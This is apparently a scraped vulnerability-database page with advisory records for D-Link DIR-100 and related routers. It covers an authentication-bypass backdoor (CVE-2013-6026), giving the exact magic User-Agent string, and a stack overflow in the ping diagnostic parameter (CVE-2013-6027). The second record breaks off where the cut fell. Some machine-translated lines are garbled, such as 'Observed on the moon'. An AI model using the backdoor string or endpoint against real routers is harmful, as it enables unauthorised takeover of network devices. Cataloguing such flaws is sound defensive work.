Vulnerabilites related to dlink - dir-100
var-201310-0388
Vulnerability from variot
The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected. In addition, attacks on this vulnerability 2013 Year 10 Observed on the moon.By a third party xmlset_roodkcableoj28840ybtide User-Agent HTTP Authentication may be avoided and settings may be changed via the header. D-Link DIR-100 is a small broadband router with integrated firewall function.
DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604 +, TM-G5240 and several Planex routers BRL-04UR and BRL-04CW, the firmware used is v1.13 There is a backdoor vulnerability. Multiple vendors are prone to a remote authentication-bypass vulnerability. This may aid in further attacks. The following are vulnerable: D-Link DIR-120 D-Link DI-624S D-Link DI-524UP D-Link DI-604S D-Link DI-604UP D-Link DI-604 D-Link DIR-100 D-Link TM-G5240 PLANEX COMMUNICATIONS BRL-04UR PLANEX COMMUNICATIONS BRL-04R PLANEX COMMUNICATIONS BRL-04CW. D-Link DIR-100 and so on are all router devices of D-Link company. Planex BRL-04R etc. are the router equipment of Japan Planex Company. The following products are affected: D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+; TM-G5240; Planex BRL-04R, BRL-04UR, BRL-04CW
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0388",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "vdsl asl-56552",
"scope": "eq",
"trust": 1.6,
"vendor": "alphanetworks",
"version": null
},
{
"model": "di-524up",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "di-604+",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "di-604s",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "di-604up",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "tm-g5240",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "di-624s",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "tm-g5240",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "di-604up",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "brl-04ur",
"scope": "eq",
"trust": 1.0,
"vendor": "planex",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "di-604s",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "di-524up",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "brl-04r",
"scope": "eq",
"trust": 1.0,
"vendor": "planex",
"version": null
},
{
"model": "brl-04cw",
"scope": "eq",
"trust": 1.0,
"vendor": "planex",
"version": null
},
{
"model": "di-604\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-120",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "vdsl asl-55052",
"scope": "eq",
"trust": 1.0,
"vendor": "alphanetworks",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "vdsl 11n wireless router",
"scope": null,
"trust": 0.8,
"vendor": "alpha",
"version": null
},
{
"model": "vdsl wired router",
"scope": null,
"trust": 0.8,
"vendor": "alpha",
"version": null
},
{
"model": "di-624s",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "brl-04cw",
"scope": null,
"trust": 0.8,
"vendor": "planex",
"version": null
},
{
"model": "brl-04r",
"scope": null,
"trust": 0.8,
"vendor": "planex",
"version": null
},
{
"model": "brl-04ur",
"scope": null,
"trust": 0.8,
"vendor": "planex",
"version": null
},
{
"model": "di-524",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.13"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:alphanetworks:vdsl_asl-56552",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:alphanetworks:vdsl_asl-55052",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:di-524up",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:di-604%2B",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:di-604s",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:di-604up",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:di-624s",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-100",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-120",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:tm-g5240",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:planex:brl-04cw",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:planex:brl-04r",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:planex:brl-04ur",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Craig Heffner and /dev/ttyS0",
"sources": [
{
"db": "BID",
"id": "62990"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6026",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-6026",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-13777",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-66028",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6026",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-6026",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-13777",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201310-477",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-66028",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "VULHUB",
"id": "VHN-66028"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router\u0027s administrative web interface. Planex and Alpha Networks devices may also be affected. In addition, attacks on this vulnerability 2013 Year 10 Observed on the moon.By a third party xmlset_roodkcableoj28840ybtide User-Agent HTTP Authentication may be avoided and settings may be changed via the header. D-Link DIR-100 is a small broadband router with integrated firewall function. \r\n\r\n\r\nDIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604 +, TM-G5240 and several Planex routers BRL-04UR and BRL-04CW, the firmware used is v1.13 There is a backdoor vulnerability. Multiple vendors are prone to a remote authentication-bypass vulnerability. This may aid in further attacks. \nThe following are vulnerable:\nD-Link DIR-120\nD-Link DI-624S\nD-Link DI-524UP\nD-Link DI-604S\nD-Link DI-604UP\nD-Link DI-604\nD-Link DIR-100\nD-Link TM-G5240\nPLANEX COMMUNICATIONS BRL-04UR\nPLANEX COMMUNICATIONS BRL-04R\nPLANEX COMMUNICATIONS BRL-04CW. D-Link DIR-100 and so on are all router devices of D-Link company. Planex BRL-04R etc. are the router equipment of Japan Planex Company. The following products are affected: D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+; TM-G5240; Planex BRL-04R, BRL-04UR, BRL-04CW",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6026"
},
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "BID",
"id": "62990"
},
{
"db": "VULHUB",
"id": "VHN-66028"
}
],
"trust": 3.24
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6026",
"trust": 3.4
},
{
"db": "CERT/CC",
"id": "VU#248083",
"trust": 3.3
},
{
"db": "BID",
"id": "62990",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-13777",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-62565",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66028",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "VULHUB",
"id": "VHN-66028"
},
{
"db": "BID",
"id": "62990"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"id": "VAR-201310-0388",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "VULHUB",
"id": "VHN-66028"
}
],
"trust": 1.3563492333333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13777"
}
]
},
"last_update_date": "2024-11-23T22:18:43.896000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Update on Router Security issue",
"trust": 0.8,
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"title": "D-Link and Planex/ router Web Repair measures for interface security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=234982"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66028"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/248083"
},
{
"trust": 1.7,
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"trust": 0.8,
"url": "http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/uk/en/support/security "
},
{
"trust": 0.8,
"url": "http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html"
},
{
"trust": 0.8,
"url": "http://pastebin.com/vbig42vd"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6026"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6026"
},
{
"trust": 0.6,
"url": "http://www.solidot.org/story?sid=36791"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "VULHUB",
"id": "VHN-66028"
},
{
"db": "BID",
"id": "62990"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"db": "VULHUB",
"id": "VHN-66028"
},
{
"db": "BID",
"id": "62990"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-10-17T00:00:00",
"db": "CERT/CC",
"id": "VU#248083"
},
{
"date": "2013-10-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"date": "2013-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-66028"
},
{
"date": "2013-10-12T00:00:00",
"db": "BID",
"id": "62990"
},
{
"date": "2013-10-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"date": "2013-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"date": "2013-10-19T10:36:08.963000",
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-29T00:00:00",
"db": "CERT/CC",
"id": "VU#248083"
},
{
"date": "2020-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13777"
},
{
"date": "2013-10-21T00:00:00",
"db": "VULHUB",
"id": "VHN-66028"
},
{
"date": "2013-12-10T00:56:00",
"db": "BID",
"id": "62990"
},
{
"date": "2013-10-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004823"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-477"
},
{
"date": "2024-11-21T01:58:38.767000",
"db": "NVD",
"id": "CVE-2013-6026"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link routers authenticate administrative access using specific User-Agent string",
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-477"
}
],
"trust": 0.6
}
}
var-201310-0389
Vulnerability from variot
Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected. The D-Link DIR-100 routers are router devices. Triggers the vulnerability to crash the web interface. Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices. The following are vulnerable: D-Link DIR-120 D-Link DI-624S D-Link DI-524UP D-Link DI-604S D-Link DI-604UP D-Link DI-604 D-Link DIR-100 D-Link TM-G5240 PLANEX COMMUNICATIONS BRL-04UR PLANEX COMMUNICATIONS BRL-04R PLANEX COMMUNICATIONS BRL-04CW. The vulnerability is caused by the script's lack of sufficient filtering of the parameters submitted by the user
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0389",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 routers",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "di-524",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "BID",
"id": "63234"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:d-link:dir-100",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Craig Heffner of /DEV/TTYS0",
"sources": [
{
"db": "BID",
"id": "63234"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6027",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2013-6027",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-13957",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-66029",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6027",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-6027",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-13957",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201310-478",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-66029",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "VULHUB",
"id": "VHN-66029"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router\u0027s administrative web interface. Planex and Alpha Networks devices may also be affected. The D-Link DIR-100 routers are router devices. Triggers the vulnerability to crash the web interface. Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. \nExploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices. \nThe following are vulnerable:\nD-Link 